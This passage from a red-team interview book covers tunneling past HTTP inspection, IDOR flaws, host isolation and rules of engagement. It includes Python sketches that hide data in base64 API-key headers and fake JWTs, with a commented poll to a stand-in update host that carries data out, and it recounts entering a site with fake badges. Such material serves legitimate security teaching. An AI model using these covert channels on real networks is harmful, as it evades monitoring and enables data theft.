Tribe of Hackers Red Team. Marcus J. Carey


that these things sell so well, though it’s certainly understandable. The people making these purchase decisions just don’t know what’s possible.

They’re also paying me tons of money to walk into their network and wrap other protocols in unintelligible data globs sent as part of HTTP proxied traffic. This recently popped up on a test, where a client had exactly this technology in place. I just built a fake “update service” that polled a remote “update server” at random intervals, sending and receiving X-API-Key headers that contained arbitrary base64-encoded data. Normally such headers contain random strings encoded as base64 or hex. In this case, we just piped any protocol/content of our choosing into that area.
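The trick works because a real API key is already just an opaque random-looking string, so tunneled data is indistinguishable from a legitimate one. A minimal sketch of the idea (the helper names and the example update URL are my own, not from any specific tooling):

```python
import base64

def wrap_payload(data: bytes) -> dict:
    """Hide arbitrary bytes inside what looks like an ordinary API-key header.

    A legitimate X-API-Key is typically just a random base64/hex string, so a
    base64 blob of tunneled data looks exactly like one to an inspecting proxy.
    """
    return {"X-API-Key": base64.b64encode(data).decode("ascii")}

def unwrap_payload(headers: dict) -> bytes:
    """Recover the tunneled bytes on the receiving end of the channel."""
    return base64.b64decode(headers["X-API-Key"])

# The fake "update service" would poll at random intervals, something like:
#   time.sleep(random.uniform(30, 300))
#   requests.get("https://updates.example.com/check",
#                headers=wrap_payload(next_chunk))
# and read the "update server's" response headers back out with
# unwrap_payload() to complete the bidirectional tunnel.
```

Any protocol whose bytes you can chunk will ride this channel; the only observable signal is header size, which is why per-packet throughput matters.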

      For higher per-packet data throughput, we could have easily utilized a fake JWT/JWS-style header value containing multiple such random strings in the body tunneling data, with a fake signature section tunneling more data—or even better, a “JWT/JWE” wherein the encrypted body is entirely ours to play with.
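A JWT's three-segment shape (header.payload.signature, each unpadded base64url) gives you three opaque fields per header value instead of one. A minimal sketch of packing arbitrary data into that shape, assuming the inspecting device does not actually validate the token:

```python
import base64

def _b64url(data: bytes) -> str:
    # JWTs use unpadded base64url, so strip the '=' padding.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def _unb64url(seg: str) -> bytes:
    # Restore the padding that _b64url stripped before decoding.
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def fake_jwt(data: bytes) -> str:
    """Pack arbitrary bytes into a header.payload.signature-shaped token.

    Each third of the data rides in one segment; to casual inspection the
    result is indistinguishable from an opaque signed token.
    """
    third = max(1, len(data) // 3)
    parts = [data[:third], data[third:2 * third], data[2 * third:]]
    return ".".join(_b64url(p) for p in parts)

def unpack_jwt(token: str) -> bytes:
    """Reassemble the tunneled bytes from all three segments."""
    return b"".join(_unb64url(seg) for seg in token.split("."))
```

The JWE variant mentioned above is even more convenient: since the body is expected to be ciphertext, high-entropy tunneled data there needs no disguise at all.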

       Have you ever recommended not doing a red team engagement?

      I’ve gotten right in the front door with a few companies. When that happens, often the rest of the test is a waste. Sometimes it’s just an honest mistake—something like a default password left on an administrator account. That stuff happens even with high-level application developers (you wouldn’t believe who). But more often than not, a test like this just becomes a slaughter because of the architectural failures of an application or system in general.

      I’ve watched applications literally unravel from within by means of insecure direct object references (IDORs). The developers thought that it was fine to perform no authN/authZ prior to object access as long as the object IDs were long and random. Hint: that is almost never okay. In the specific case I’m thinking of, you could request a series of tokens if you knew only one starting tokenized value. They assumed you could get that token only if you were logged in as the user it belonged to. It turned out that you could find the token by requesting their password reset page with the user’s email and then pull down a series of chained requests to compromise everything that belonged to the user.
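The underlying anti-pattern is treating an unguessable ID as a substitute for authorization. A minimal sketch of the flaw and the fix (the store and function names here are hypothetical, not from the engagement described):

```python
import secrets

# Hypothetical object store: token -> (owner, payload). The flawed design
# assumed a long random token was itself sufficient protection.
OBJECTS = {
    secrets.token_urlsafe(32): ("alice", "alice's private document"),
}

def fetch_insecure(token: str) -> str:
    # IDOR anti-pattern: anyone holding the token gets the object, with no
    # authN/authZ check at all. Leak one token (say, via a password-reset
    # page) and everything chained from it falls.
    owner, payload = OBJECTS[token]
    return payload

def fetch_secure(token: str, authenticated_user: str) -> str:
    # Fix: randomness is not authorization. Verify that the logged-in user
    # actually owns the object before returning it.
    owner, payload = OBJECTS[token]
    if owner != authenticated_user:
        raise PermissionError("not your object")
    return payload
```

With the ownership check in place, a leaked token is worth nothing to an attacker who cannot also authenticate as its owner.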

      In these architectural cases, the offer isn’t to continue red teaming them. The offer is to help them rebuild their application from the ground up with a member of our team working with them to ensure they make valid security decisions.

       What’s the most important or easiest-to-implement control that can prevent you from compromising a system or network?

One hundred percent client (host) isolation. Unless the systems on your network absolutely must be talking to each other, you need to implement this, and you need to do it now. Especially in the modern world of AWS, GCP, and Azure, your business applications aren’t living on-premises. They’re living somewhere else, accessed via an external pipe that exits your LAN/WAN. Few organizations have any need for workstations to talk directly to each other. Not only is this functionality all but useless in most business use cases, but implementing isolation also stops a huge number of attacks that we would otherwise be able to leverage to gain access to and exploit your network resources. Without device-to-device access, how am I supposed to find and exploit unpatched servers or workstations on your network? How am I supposed to pivot laterally? How am I supposed to relay credentials or access a rogue SMB shared directory? You implement isolation, and I guarantee you will watch red teams fail.

       Why do you feel it is critical to stay within the rules of engagement?

      When it comes to causing harm, that’s a huge no-brainer. You want to have a job? You want people to trust you? You want to not be in jail? However, I think people often get tripped up over some of the gentler rules surrounding things like scope and attack types. These are the gray areas where it’s easier to just let things slide. You shouldn’t do this. Don’t let it slide, and don’t purposely play in the gray areas. Here’s what you need to do.

Have an open chain of communication with your client through which you can easily reach out at any time. When you bump into a gray area, don’t just keep going. Reach out to your client and request clarification. If the rules of engagement or the project scope doesn’t match the reality of the application/network/system, renegotiate it.

      “Have an open chain of communication with your client through which you can easily reach out at any time.”

      Literally everything is up for negotiation. Talk with people.

       If you were ever busted on a penetration test or other engagement, how did you handle it?

I’ve never managed to get hard busted yet, though I’ve heard some great stories. I seem to be pretty good at living off the land to avoid detection in network pivots. As a result, I rarely get noticed by network security teams. When I’m blocked during external tests, I literally just round-robin out of their way and back into attacking.

      I was stopped from entering a building once during a physical penetration test. I wouldn’t say that they “caught us” as much as their security procedures didn’t allow random people who showed up at the gate claiming to be “mold inspectors” to enter without a signed work order waiting for them. They asked us to head down to the security office, and they left me and my partner alone in their control room with just one guard checking out our credentials on his computer. When he didn’t find our fake mold inspector badges listed for entry, he simply asked us to leave.

      I know it’s not a crazy cool story. But hey, maybe if you’re nervous about how hard some of the heart-pumping, adrenaline-inducing portions of red teaming might be, even getting caught isn’t always that bad. In the end, they just asked us to leave. We flew to another state and broke into a different facility for the same company.

       What is the biggest ethical quandary you experienced while on an assigned objective?

      “Should I report this to the vendor?” is a huge one, especially when it involves systems that you know are in production globally at a massive scale. The moral penalty for not reporting can be huge. But, there are certainly situations in which you’ll find yourself locked into an NDA that limits your ability to share findings with a third party. In this case, it’s often best to work with your client and have them report or permit a redacted report to be transmitted to the selected third party. This is yet another reason that it’s good to have great clients. It’s important to choose who you work with.

       How does the red team work together to get the job done?

I think communication within red teams is a huge hindrance that must necessarily be overcome. The work that we do is incredibly complex and terribly high in specificity, especially when you factor in the issues that our perspective adds to our tasks. We don’t usually have a control console flashing lights and outputting debug information to tell us what a system is doing internally as we interrogate it. Instead, we have to work out what’s happening inside by tracking huge numbers of variables indicated by external responses (such as error messages). Communicating exactly
